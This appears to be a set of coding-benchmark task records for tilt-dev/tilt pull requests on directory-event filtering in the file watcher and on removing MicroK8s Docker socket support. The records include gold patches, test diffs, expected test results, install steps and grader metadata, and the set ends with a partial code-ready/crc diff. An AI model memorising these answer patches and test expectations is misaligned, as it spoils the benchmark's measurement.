diff --git a/internal/controllers/core/filewatch/controller.go b/internal/controllers/core/filewatch/controller.go index 13309173c..5b66aedab 100644 --- a/internal/controllers/core/filewatch/controller.go +++ b/internal/controllers/core/filewatch/controller.go @@ -190,6 +190,10 @@ func (c *Controller) addOrReplace(ctx context.Context, name types.NamespacedName w.restartBackoff = existing.restartBackoff status.Error = existing.status.Error } + if hasExisting { + status.FileEvents = existing.status.FileEvents + status.LastEventTime = existing.status.LastEventTime + } ignoreMatcher := ignore.CreateFileChangeFilter(fw.Spec.Ignores) startFileChangeLoop := false diff --git a/internal/docker/client.go b/internal/docker/client.go index 4e224ec91..03e8018d1 100644 --- a/internal/docker/client.go +++ b/internal/docker/client.go @@ -69,10 +69,6 @@ var minDockerVersionExperimentalBuildkit = semver.MustParse("1.38.0") var versionTimeout = 5 * time.Second -// microk8s exposes its own docker socket -// https://github.com/ubuntu/microk8s/blob/master/docs/dockerd.md -const microK8sDockerHost = "unix:///var/snap/microk8s/current/docker.sock" - // Create an interface so this can be mocked out. type Client interface { CheckConnected() error diff --git a/internal/docker/env.go b/internal/docker/env.go index 14d0be15a..86e9bae28 100644 --- a/internal/docker/env.go +++ b/internal/docker/env.go @@ -246,21 +246,6 @@ func ProvideClusterEnv( } } - if product == clusterid.ProductMicroK8s && kClient.ContainerRuntime(ctx) == container.RuntimeDocker { - // If we're running Microk8s with a docker runtime, talk to Microk8s's docker socket. - d, err := creator.FromEnvMap(map[string]string{"DOCKER_HOST": microK8sDockerHost}) - if err != nil { - return ClusterEnv{Error: fmt.Errorf("connecting to microk8s: %v", err)} - } - - // Handle the case where people manually set DOCKER_HOST to microk8s. 
- if hostOverride == "" || hostOverride == d.DaemonHost() { - env.Client = d - env.Environ = append(env.Environ, fmt.Sprintf("DOCKER_HOST=%s", microK8sDockerHost)) - env.BuildToKubeContexts = append(env.BuildToKubeContexts, string(kubeContext)) - } - } - if env.Client == nil { client, err := creator.FromCLI(ctx) env.Client = client @@ -274,8 +259,7 @@ func ProvideClusterEnv( // images) // // currently, we handle this by inspecting the Docker + K8s configs to see - // if they're matched up, but with the exception of microk8s (handled above), - // we don't override the environmental Docker config + // if they're matched up, but we don't override the environmental Docker config if willBuildToKubeContext(ctx, product, kubeContext, env) && kClient.ContainerRuntime(ctx) == container.RuntimeDocker { env.BuildToKubeContexts = append(env.BuildToKubeContexts, string(kubeContext)) diff --git a/internal/ospath/ospath.go b/internal/ospath/ospath.go index 618542fb4..2adb78e91 100644 --- a/internal/ospath/ospath.go +++ b/internal/ospath/ospath.go @@ -154,6 +154,15 @@ func IsDir(path string) bool { return f.Mode().IsDir() } +func IsDirLstat(path string) bool { + f, err := os.Lstat(path) + if err != nil { + return false + } + + return f.Mode().IsDir() +} + func IsBrokenSymlink(path string) (bool, error) { // Stat resolves symlinks, lstat does not. 
// So if Stat reports IsNotExist, but Lstat does not, diff --git a/internal/watch/watcher_darwin.go b/internal/watch/watcher_darwin.go index 785b70ad4..ba0014791 100644 --- a/internal/watch/watcher_darwin.go +++ b/internal/watch/watcher_darwin.go @@ -38,12 +38,19 @@ func (d *darwinNotify) loop() { e.Path = filepath.Join("/", e.Path) _, isPathWereWatching := d.pathsWereWatching[e.Path] - if e.Flags&fsevents.ItemIsDir == fsevents.ItemIsDir && isPathWereWatching { + isDir := e.Flags&fsevents.ItemIsDir == fsevents.ItemIsDir + if isDir && isPathWereWatching { // For consistency with Linux and Windows, don't fire any events // for directories that we're watching -- only their contents. continue } + // On MacOS, modifying a directory entry fires Created | InodeMetaMod + // Ignore these events, mod time modifications shouldnt trigger copies. + if isDir && (e.Flags&fsevents.ItemInodeMetaMod) == fsevents.ItemInodeMetaMod { + continue + } + ignore, err := d.ignore.Matches(e.Path) if err != nil { d.logger.Infof("Error matching path %q: %v", e.Path, err) diff --git a/internal/watch/watcher_naive.go b/internal/watch/watcher_naive.go index 00ca01174..e7b4482fc 100644 --- a/internal/watch/watcher_naive.go +++ b/internal/watch/watcher_naive.go @@ -151,16 +151,32 @@ func (d *naiveNotify) loop() { } if e.Op&fsnotify.Create != fsnotify.Create { - if d.shouldNotify(e.Name) { - d.wrappedEvents <- FileEvent{e.Name} + if !d.shouldNotify(e.Name) { + continue } + + // Don't send events for directories when the modtime is being changed. + // + // This is a bit of a hack because every OS represents modtime updates + // a bit differently and they don't map well to fsnotify events. + // + // On Windows, updating the modtime of a directory is a fsnotify.Write. + // On Linux, it's a fsnotify.Chmod. 
+ isDirUpdateOnly := (e.Op == fsnotify.Write || e.Op == fsnotify.Chmod) && + ospath.IsDir(e.Name) + if isDirUpdateOnly { + continue + } + + d.wrappedEvents <- FileEvent{e.Name} continue } if d.isWatcherRecursive { - if d.shouldNotify(e.Name) { - d.wrappedEvents <- FileEvent{e.Name} + if !d.shouldNotify(e.Name) { + continue } + d.wrappedEvents <- FileEvent{e.Name} continue } @@ -223,8 +239,7 @@ func (d *naiveNotify) shouldNotify(path string) bool { if _, ok := d.notifyList[path]; ok { // We generally don't care when directories change at the root of an ADD - stat, err := os.Lstat(path) - isDir := err == nil && stat.IsDir() + isDir := ospath.IsDirLstat(path) if isDir { return false }
watch: tweak dir change events fixes https://github.com/tilt-dev/tilt/issues/6485 Signed-off-by: Nick Santos <nick.santos@docker.com>
**Title** Prevent unnecessary rebuilds caused by directory metadata changes and clean up MicroK8s Docker handling **Problem** File watchers were treating modifications to directory metadata (e.g., timestamp updates) as change events, leading to spurious rebuilds. Additionally, the Docker environment code contained legacy handling for MicroK8s that is no longer required. **Root Cause** The watcher logic did not differentiate between content changes and pure directory metadata changes, and the Docker setup used a hard‑coded socket path for MicroK8s that could interfere with normal Docker detection. **Fix / Expected Behavior** - Preserve existing file‑event status when updating watch controllers. - Ignore directory‑only metadata events on all platforms, ensuring only real file changes trigger rebuilds. - Introduce a reliable check for directories that follows symbolic links correctly. - Remove the obsolete MicroK8s Docker socket override, allowing standard Docker discovery to proceed. - Maintain correct ignore‑pattern handling and recursive watching behavior. **Risk & Validation** - Verify that legitimate file modifications still produce rebuilds across macOS, Linux, and Windows. - Confirm that directory timestamp updates no longer cause unnecessary events. - Run Docker integration tests to ensure the environment works without the MicroK8s special case. - Perform end‑to‑end tests on typical Tilt workflows to catch any regression in watch handling.
6,488
tilt-dev/tilt
diff --git a/internal/controllers/core/filewatch/controller_test.go b/internal/controllers/core/filewatch/controller_test.go index ba392f531..1afbe0c6e 100644 --- a/internal/controllers/core/filewatch/controller_test.go +++ b/internal/controllers/core/filewatch/controller_test.go @@ -324,13 +324,14 @@ func TestController_Reconcile_Watches(t *testing.T) { assert.Truef(t, updatedStart.After(originalStart), "Monitor start time should be more recent after update, (original: %s, updated: %s)", originalStart, updatedStart) - if assert.Equal(t, 2, len(updated.Status.FileEvents)) { + if assert.Equal(t, 3, len(updated.Status.FileEvents)) { // ensure ONLY the expected files were seen assert.NotZero(t, updated.Status.FileEvents[0].Time.Time) - mostRecentEventTime := updated.Status.FileEvents[1].Time.Time + mostRecentEventTime := updated.Status.FileEvents[2].Time.Time assert.NotZero(t, mostRecentEventTime) - assert.Equal(t, []string{f.tmpdir.JoinPath("d", "1")}, updated.Status.FileEvents[0].SeenFiles) - assert.Equal(t, []string{f.tmpdir.JoinPath("d", "2")}, updated.Status.FileEvents[1].SeenFiles) + assert.Equal(t, []string{f.tmpdir.JoinPath("a", "1")}, updated.Status.FileEvents[0].SeenFiles) + assert.Equal(t, []string{f.tmpdir.JoinPath("d", "1")}, updated.Status.FileEvents[1].SeenFiles) + assert.Equal(t, []string{f.tmpdir.JoinPath("d", "2")}, updated.Status.FileEvents[2].SeenFiles) assert.Equal(t, mostRecentEventTime, updated.Status.LastEventTime.Time) } } diff --git a/internal/docker/client_test.go b/internal/docker/client_test.go index e71b16a8d..99ec4d2f9 100644 --- a/internal/docker/client_test.go +++ b/internal/docker/client_test.go @@ -150,18 +150,6 @@ func TestProvideClusterProduct(t *testing.T) { Client: hostClient{Host: "tcp://192.168.99.100:2376"}, }, }, - { - env: clusterid.ProductMicroK8s, - runtime: container.RuntimeDocker, - expectedCluster: Env{ - Client: hostClient{Host: "unix:///var/snap/microk8s/current/docker.sock"}, - Environ: 
[]string{"DOCKER_HOST=unix:///var/snap/microk8s/current/docker.sock"}, - BuildToKubeContexts: []string{"microk8s-me"}, - }, - expectedLocal: Env{ - Client: hostClient{Host: "unix:///var/run/docker.sock"}, - }, - }, { env: clusterid.ProductMicroK8s, runtime: container.RuntimeCrio, diff --git a/internal/watch/notify_test.go b/internal/watch/notify_test.go index 533bce175..d44316a7f 100644 --- a/internal/watch/notify_test.go +++ b/internal/watch/notify_test.go @@ -218,6 +218,24 @@ func TestWatchDirectoryAndTouchIt(t *testing.T) { f.assertEvents() } +func TestWatchDirectoryAndTouchSubdir(t *testing.T) { + f := newNotifyFixture(t) + + cTime := time.Now() + root := f.TempDir("root") + path := filepath.Join(root, "change") + a := filepath.Join(path, "a.txt") + f.WriteFile(a, "a") + + f.watch(root) + f.fsync() + + err := os.Chtimes(path, cTime, time.Now().Add(time.Minute)) + assert.NoError(t, err) + + f.assertEvents() +} + func TestWatchNonExistentPathDoesNotFireSiblingEvent(t *testing.T) { f := newNotifyFixture(t)
[ "TestController_Reconcile_Watches" ]
[ "TestController_LimitFileEventsHistory", "TestController_ShortRead", "TestController_IgnoreEphemeralFiles", "TestController_Watcher_Cancel", "TestController_Reconcile_Create", "TestController_Reconcile_Delete", "TestController_Disable_By_Configmap", "TestController_Disable_Ignores_File_Changes", "TestCreateSubError", "TestStartSubError" ]
No new interfaces are introduced.
Apache-2.0
{ "base_image_name": "go_1.23.8", "install": [ "export DEBIAN_FRONTEND=noninteractive", "apt-get update -qq", "apt-get install -y -qq wget", "wget https://go.dev/dl/go1.23.0.linux-amd64.tar.gz", "tar -C /usr/local -xzf go1.23.0.linux-amd64.tar.gz", "export PATH=$PATH:/usr/local/go/bin", "export HOME=/root", "export GOPATH=$HOME/go", "export GOCACHE=$HOME/.cache/go-build", "mkdir -p $GOPATH", "mkdir -p $GOCACHE", "go install gotest.tools/gotestsum@latest" ], "log_parser": "parse_log_gotest", "test_cmd": "go test -mod vendor -v ./internal/controllers/core/filewatch/..." }
{ "num_modified_files": 6, "num_modified_lines": 43, "pr_author": "nicks", "pr_labels": [], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/tilt-dev/tilt/issues/6485" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "edge_case_bug" ], "reason": null, "reasoning": "The issue asks to tweak how directory change events are handled by the file‑watch system. The test changes add a new test for sub‑directory timestamp changes and adjust expectations in existing controller tests, while the implementation adds logic to ignore directory mod‑time events on all platforms. The issue statement provides no concrete acceptance criteria, making the specification ambiguous (B4). The test suite also includes unrelated Docker environment cleanup, but the core change aligns with the intended watch behavior.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, 
"test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
59f9aa24c86dc5302772c61905275fd90675596f
2025-02-04 07:52:40
tilt-dev__tilt-6495
diff --git a/internal/controllers/core/filewatch/controller.go b/internal/controllers/core/filewatch/controller.go index 13309173c..5b66aedab 100644 --- a/internal/controllers/core/filewatch/controller.go +++ b/internal/controllers/core/filewatch/controller.go @@ -190,6 +190,10 @@ func (c *Controller) addOrReplace(ctx context.Context, name types.NamespacedName w.restartBackoff = existing.restartBackoff status.Error = existing.status.Error } + if hasExisting { + status.FileEvents = existing.status.FileEvents + status.LastEventTime = existing.status.LastEventTime + } ignoreMatcher := ignore.CreateFileChangeFilter(fw.Spec.Ignores) startFileChangeLoop := false diff --git a/internal/docker/client.go b/internal/docker/client.go index 4e224ec91..03e8018d1 100644 --- a/internal/docker/client.go +++ b/internal/docker/client.go @@ -69,10 +69,6 @@ var minDockerVersionExperimentalBuildkit = semver.MustParse("1.38.0") var versionTimeout = 5 * time.Second -// microk8s exposes its own docker socket -// https://github.com/ubuntu/microk8s/blob/master/docs/dockerd.md -const microK8sDockerHost = "unix:///var/snap/microk8s/current/docker.sock" - // Create an interface so this can be mocked out. type Client interface { CheckConnected() error diff --git a/internal/docker/env.go b/internal/docker/env.go index 14d0be15a..86e9bae28 100644 --- a/internal/docker/env.go +++ b/internal/docker/env.go @@ -246,21 +246,6 @@ func ProvideClusterEnv( } } - if product == clusterid.ProductMicroK8s && kClient.ContainerRuntime(ctx) == container.RuntimeDocker { - // If we're running Microk8s with a docker runtime, talk to Microk8s's docker socket. - d, err := creator.FromEnvMap(map[string]string{"DOCKER_HOST": microK8sDockerHost}) - if err != nil { - return ClusterEnv{Error: fmt.Errorf("connecting to microk8s: %v", err)} - } - - // Handle the case where people manually set DOCKER_HOST to microk8s. 
- if hostOverride == "" || hostOverride == d.DaemonHost() { - env.Client = d - env.Environ = append(env.Environ, fmt.Sprintf("DOCKER_HOST=%s", microK8sDockerHost)) - env.BuildToKubeContexts = append(env.BuildToKubeContexts, string(kubeContext)) - } - } - if env.Client == nil { client, err := creator.FromCLI(ctx) env.Client = client @@ -274,8 +259,7 @@ func ProvideClusterEnv( // images) // // currently, we handle this by inspecting the Docker + K8s configs to see - // if they're matched up, but with the exception of microk8s (handled above), - // we don't override the environmental Docker config + // if they're matched up, but we don't override the environmental Docker config if willBuildToKubeContext(ctx, product, kubeContext, env) && kClient.ContainerRuntime(ctx) == container.RuntimeDocker { env.BuildToKubeContexts = append(env.BuildToKubeContexts, string(kubeContext))
docker: remove support for building to microk8s docker socket i think this feature was removed from microk8s years ago and we no longer need to support it. fixes https://github.com/tilt-dev/tilt/issues/6494 Signed-off-by: Nick Santos <nick.santos@docker.com>
**Title** Remove outdated MicroK8s Docker socket handling **Problem** Tilt tried to detect and switch to a special Docker socket when running on MicroK8s. That socket is no longer provided, causing unnecessary configuration changes and potential build failures. **Root Cause** Hard‑coded logic assumed a MicroK8s Docker daemon at a fixed path, which is obsolete. **Fix / Expected Behavior** - Eliminate the MicroK8s‑specific Docker host constant and all related conditional paths. - Stop overriding the Docker environment for MicroK8s clusters; rely on the default Docker configuration. - Preserve existing file‑watch status (file events and last event time) when a watch entry is updated. - Ensure regular Docker/Kubernetes environments continue to operate unchanged. - Simplify the cluster environment provisioning logic by removing the special case. **Risk & Validation** - Verify that builds and deployments work unchanged on standard Docker and non‑MicroK8s clusters. - Run the full test suite to confirm no regressions in file‑watch behavior. - Manually test on a current MicroK8s installation to ensure Tilt gracefully falls back to the default Docker socket.
6,495
tilt-dev/tilt
diff --git a/internal/controllers/core/filewatch/controller_test.go b/internal/controllers/core/filewatch/controller_test.go index ba392f531..1afbe0c6e 100644 --- a/internal/controllers/core/filewatch/controller_test.go +++ b/internal/controllers/core/filewatch/controller_test.go @@ -324,13 +324,14 @@ func TestController_Reconcile_Watches(t *testing.T) { assert.Truef(t, updatedStart.After(originalStart), "Monitor start time should be more recent after update, (original: %s, updated: %s)", originalStart, updatedStart) - if assert.Equal(t, 2, len(updated.Status.FileEvents)) { + if assert.Equal(t, 3, len(updated.Status.FileEvents)) { // ensure ONLY the expected files were seen assert.NotZero(t, updated.Status.FileEvents[0].Time.Time) - mostRecentEventTime := updated.Status.FileEvents[1].Time.Time + mostRecentEventTime := updated.Status.FileEvents[2].Time.Time assert.NotZero(t, mostRecentEventTime) - assert.Equal(t, []string{f.tmpdir.JoinPath("d", "1")}, updated.Status.FileEvents[0].SeenFiles) - assert.Equal(t, []string{f.tmpdir.JoinPath("d", "2")}, updated.Status.FileEvents[1].SeenFiles) + assert.Equal(t, []string{f.tmpdir.JoinPath("a", "1")}, updated.Status.FileEvents[0].SeenFiles) + assert.Equal(t, []string{f.tmpdir.JoinPath("d", "1")}, updated.Status.FileEvents[1].SeenFiles) + assert.Equal(t, []string{f.tmpdir.JoinPath("d", "2")}, updated.Status.FileEvents[2].SeenFiles) assert.Equal(t, mostRecentEventTime, updated.Status.LastEventTime.Time) } } diff --git a/internal/docker/client_test.go b/internal/docker/client_test.go index e71b16a8d..99ec4d2f9 100644 --- a/internal/docker/client_test.go +++ b/internal/docker/client_test.go @@ -150,18 +150,6 @@ func TestProvideClusterProduct(t *testing.T) { Client: hostClient{Host: "tcp://192.168.99.100:2376"}, }, }, - { - env: clusterid.ProductMicroK8s, - runtime: container.RuntimeDocker, - expectedCluster: Env{ - Client: hostClient{Host: "unix:///var/snap/microk8s/current/docker.sock"}, - Environ: 
[]string{"DOCKER_HOST=unix:///var/snap/microk8s/current/docker.sock"}, - BuildToKubeContexts: []string{"microk8s-me"}, - }, - expectedLocal: Env{ - Client: hostClient{Host: "unix:///var/run/docker.sock"}, - }, - }, { env: clusterid.ProductMicroK8s, runtime: container.RuntimeCrio,
[ "TestController_Reconcile_Watches" ]
[ "TestController_LimitFileEventsHistory", "TestController_ShortRead", "TestController_IgnoreEphemeralFiles", "TestController_Watcher_Cancel", "TestController_Reconcile_Create", "TestController_Reconcile_Delete", "TestController_Disable_By_Configmap", "TestController_Disable_Ignores_File_Changes", "TestCreateSubError", "TestStartSubError" ]
No new interfaces are introduced.
Apache-2.0
{ "base_image_name": "go_1.23.8", "install": [ "export DEBIAN_FRONTEND=noninteractive", "apt-get update -qq", "apt-get install -y -qq wget", "wget https://go.dev/dl/go1.23.0.linux-amd64.tar.gz", "tar -C /usr/local -xzf go1.23.0.linux-amd64.tar.gz", "export PATH=$PATH:/usr/local/go/bin", "export HOME=/root", "export GOPATH=$HOME/go", "export GOCACHE=$HOME/.cache/go-build", "mkdir -p $GOPATH", "mkdir -p $GOCACHE", "go install gotest.tools/gotestsum@latest" ], "log_parser": "parse_log_gotest", "test_cmd": "go test -mod vendor -v ./internal/controllers/core/filewatch/..." }
{ "num_modified_files": 3, "num_modified_lines": 5, "pr_author": "nicks", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/tilt-dev/tilt/issues/6494" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "dev_ops_enh" ], "reason": null, "reasoning": "The issue requests removal of MicroK8s Docker socket support, which is clearly stated and the test patch reflects the needed changes (dropping MicroK8s cases and adjusting filewatch expectations). The provided tests align with the removal and no extra requirements are introduced. There are no signals of test-suite coupling, implicit naming, external spec reliance, ambiguous specs, unrelated patch artifacts, or hidden domain knowledge, so the task is cleanly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, 
"test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
191fbb28376f68e82cb9b49d954a62c257e0263e
2020-12-22 20:38:03
openshift-ci-robot: [APPROVALNOTIFIER] This PR is **APPROVED** This pull-request has been approved by: *<a href="https://github.com/code-ready/crc/pull/1794#" title="Author self-approved">guillaumerose</a>* The full list of commands accepted by this bot can be found [here](https://go.k8s.io/bot-commands?repo=code-ready%2Fcrc). The pull request process is described [here](https://git.k8s.io/community/contributors/guide/owners.md#the-code-review-process) <details > Needs approval from an approver in each of these files: - ~~[OWNERS](https://github.com/code-ready/crc/blob/master/OWNERS)~~ [guillaumerose] Approvers can indicate their approval by writing `/approve` in a comment Approvers can cancel approval by writing `/approve cancel` in a comment </details> <!-- META={"approvers":[]} --> openshift-ci[bot]: @guillaumerose: The following test **failed**, say `/retest` to rerun all failed tests: Test name | Commit | Details | Rerun command --- | --- | --- | --- ci/prow/e2e-crc | b5323506470224e3ebf5912f09daeeec16421f99 | [link](https://prow.ci.openshift.org/view/gs/origin-ci-test/pr-logs/pull/code-ready_crc/1794/pull-ci-code-ready-crc-master-e2e-crc/1341483163070763008) | `/test e2e-crc` [Full PR test history](https://prow.ci.openshift.org/pr-history?org=code-ready&repo=crc&pr=1794). [Your PR dashboard](https://prow.ci.openshift.org/pr?query=is:pr+state:open+author:guillaumerose). <details> Instructions for interacting with me using PR comments are available [here](https://git.k8s.io/community/contributors/guide/pull-requests.md). If you have questions or suggestions related to my behavior, please file an issue against the [kubernetes/test-infra](https://github.com/kubernetes/test-infra/issues/new?title=Prow%20issue:) repository. I understand the commands that are listed [here](https://go.k8s.io/bot-commands). </details> <!-- test report --> gbraad: haven't looked at the PR yet, but from the discussions with management we shouldn't send stacktraces (or logs). 
so we need to be smarter about the error messages first and prevent being ambiguous before we can send an error message, gbraad: I see the change from the wrapper to an attachMiddleware function. somehow the clarity is lost because of this; has become very indirect like a generic exceptionhandler. this does not mean it is wrong, just 'afraid' it is harder to find ... perhaps good to understand what other use `attachMiddleware` would have. as it is now a single use function. guillaumerose: rebased! guillaumerose: All comments seem to be resolved. @praveenkumar @gbraad can you PTAL? Thanks. praveenkumar: /lgtm
code-ready__crc-1794
diff --git a/cmd/crc/cmd/cleanup.go b/cmd/crc/cmd/cleanup.go index 854504fbd..c443917b8 100644 --- a/cmd/crc/cmd/cleanup.go +++ b/cmd/crc/cmd/cleanup.go @@ -6,7 +6,6 @@ import ( "io" "os" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/preflight" "github.com/spf13/cobra" ) @@ -20,10 +19,8 @@ var cleanupCmd = &cobra.Command{ Use: "cleanup", Short: "Undo config changes", Long: "Undo all the configuration changes done by 'crc setup' command", - Run: func(cmd *cobra.Command, args []string) { - if err := runCleanup(); err != nil { - exit.WithMessage(1, err.Error()) - } + RunE: func(cmd *cobra.Command, args []string) error { + return runCleanup() }, } diff --git a/cmd/crc/cmd/config/get.go b/cmd/crc/cmd/config/get.go index 1acb8cdc2..2a6cb92f7 100644 --- a/cmd/crc/cmd/config/get.go +++ b/cmd/crc/cmd/config/get.go @@ -1,10 +1,10 @@ package config import ( + "errors" "fmt" "github.com/code-ready/crc/pkg/crc/config" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/output" "github.com/spf13/cobra" ) @@ -14,20 +14,21 @@ func configGetCmd(config config.Storage) *cobra.Command { Use: "get CONFIG-KEY", Short: "Get a crc configuration property", Long: `Gets a crc configuration property.`, - Run: func(cmd *cobra.Command, args []string) { + RunE: func(cmd *cobra.Command, args []string) error { if len(args) < 1 { - exit.WithMessage(1, "Please provide a configuration property to get") + return errors.New("Please provide a configuration property to get") } key := args[0] v := config.Get(key) switch { case v.Invalid: - exit.WithMessage(1, fmt.Sprintf("Configuration property '%s' does not exist", key)) + return fmt.Errorf("Configuration property '%s' does not exist", key) case v.IsDefault: - exit.WithMessage(1, fmt.Sprintf("Configuration property '%s' is not set. Default value is '%s'", key, v.AsString())) + return fmt.Errorf("Configuration property '%s' is not set. 
Default value is '%s'", key, v.AsString()) default: output.Outln(key, ":", v.AsString()) } + return nil }, } } diff --git a/cmd/crc/cmd/config/set.go b/cmd/crc/cmd/config/set.go index 3325855a2..f6b356b20 100644 --- a/cmd/crc/cmd/config/set.go +++ b/cmd/crc/cmd/config/set.go @@ -1,8 +1,9 @@ package config import ( + "errors" + "github.com/code-ready/crc/pkg/crc/config" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/output" "github.com/spf13/cobra" ) @@ -12,18 +13,19 @@ func configSetCmd(config config.Storage) *cobra.Command { Use: "set CONFIG-KEY VALUE", Short: "Set a crc configuration property", Long: `Sets a crc configuration property.`, - Run: func(cmd *cobra.Command, args []string) { + RunE: func(cmd *cobra.Command, args []string) error { if len(args) < 2 { - exit.WithMessage(1, "Please provide a configuration property and its value as in 'crc config set KEY VALUE'") + return errors.New("Please provide a configuration property and its value as in 'crc config set KEY VALUE'") } setMessage, err := config.Set(args[0], args[1]) if err != nil { - exit.WithMessage(1, err.Error()) + return err } if setMessage != "" { output.Outln(setMessage) } + return nil }, } } diff --git a/cmd/crc/cmd/config/unset.go b/cmd/crc/cmd/config/unset.go index 16a0bf9c7..cfbe6484b 100644 --- a/cmd/crc/cmd/config/unset.go +++ b/cmd/crc/cmd/config/unset.go @@ -1,8 +1,9 @@ package config import ( + "errors" + "github.com/code-ready/crc/pkg/crc/config" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/output" "github.com/spf13/cobra" ) @@ -12,17 +13,18 @@ func configUnsetCmd(config config.Storage) *cobra.Command { Use: "unset CONFIG-KEY", Short: "Unset a crc configuration property", Long: `Unsets a crc configuration property.`, - Run: func(cmd *cobra.Command, args []string) { + RunE: func(cmd *cobra.Command, args []string) error { if len(args) != 1 { - exit.WithMessage(1, "Please provide a configuration property to unset") + return 
errors.New("Please provide a configuration property to unset") } unsetMessage, err := config.Unset(args[0]) if err != nil { - exit.WithMessage(1, err.Error()) + return err } if unsetMessage != "" { output.Outln(unsetMessage) } + return nil }, } } diff --git a/cmd/crc/cmd/config/view.go b/cmd/crc/cmd/config/view.go index 3905d73f6..f574e3f1a 100644 --- a/cmd/crc/cmd/config/view.go +++ b/cmd/crc/cmd/config/view.go @@ -9,7 +9,6 @@ import ( "text/template" "github.com/code-ready/crc/pkg/crc/config" - "github.com/code-ready/crc/pkg/crc/logging" "github.com/spf13/cobra" ) @@ -29,14 +28,12 @@ func configViewCmd(config config.Storage) *cobra.Command { Use: "view", Short: "Display all assigned crc configuration properties", Long: `Displays all assigned crc configuration properties and their values.`, - Run: func(cmd *cobra.Command, args []string) { + RunE: func(cmd *cobra.Command, args []string) error { tmpl, err := determineTemplate(configViewFormat) if err != nil { - logging.Fatal(err) - } - if err := runConfigView(config.AllConfigs(), tmpl, os.Stdout); err != nil { - logging.Fatal(err) + return err } + return runConfigView(config.AllConfigs(), tmpl, os.Stdout) }, } configViewCmd.Flags().StringVar(&configViewFormat, "format", DefaultConfigViewFormat, diff --git a/cmd/crc/cmd/console.go b/cmd/crc/cmd/console.go index 7a28e002b..ef5831c7c 100644 --- a/cmd/crc/cmd/console.go +++ b/cmd/crc/cmd/console.go @@ -6,7 +6,6 @@ import ( "io" "os" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/machine" "github.com/code-ready/machine/libmachine/state" "github.com/pkg/browser" @@ -31,10 +30,8 @@ var consoleCmd = &cobra.Command{ Aliases: []string{"dashboard"}, Short: "Open the OpenShift Web Console in the default browser", Long: `Open the OpenShift Web Console in the default browser or print its URL or credentials`, - Run: func(cmd *cobra.Command, args []string) { - if renderErr := runConsole(os.Stdout, newMachine(), consolePrintURL, 
consolePrintCredentials, outputFormat); renderErr != nil { - exit.WithMessage(1, renderErr.Error()) - } + RunE: func(cmd *cobra.Command, args []string) error { + return runConsole(os.Stdout, newMachine(), consolePrintURL, consolePrintCredentials, outputFormat) }, } diff --git a/cmd/crc/cmd/daemon.go b/cmd/crc/cmd/daemon.go index ab33bea91..f20530cbd 100644 --- a/cmd/crc/cmd/daemon.go +++ b/cmd/crc/cmd/daemon.go @@ -12,7 +12,6 @@ import ( crcConfig "github.com/code-ready/crc/pkg/crc/config" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/logging" "github.com/code-ready/gvisor-tap-vsock/pkg/transport" "github.com/code-ready/gvisor-tap-vsock/pkg/types" @@ -32,7 +31,7 @@ var daemonCmd = &cobra.Command{ Short: "Run the crc daemon", Long: "Run the crc daemon", Hidden: true, - Run: func(cmd *cobra.Command, args []string) { + RunE: func(cmd *cobra.Command, args []string) error { // setup separate logging for daemon logging.CloseLogging() logging.InitLogrus(logging.LogLevel, constants.DaemonLogFilePath) @@ -50,7 +49,7 @@ var daemonCmd = &cobra.Command{ } } - if err := run(&types.Configuration{ + err := run(&types.Configuration{ Debug: false, // never log packets CaptureFile: captureFile(), MTU: 4000, // Large packets slightly improve the performance. Less small packets. 
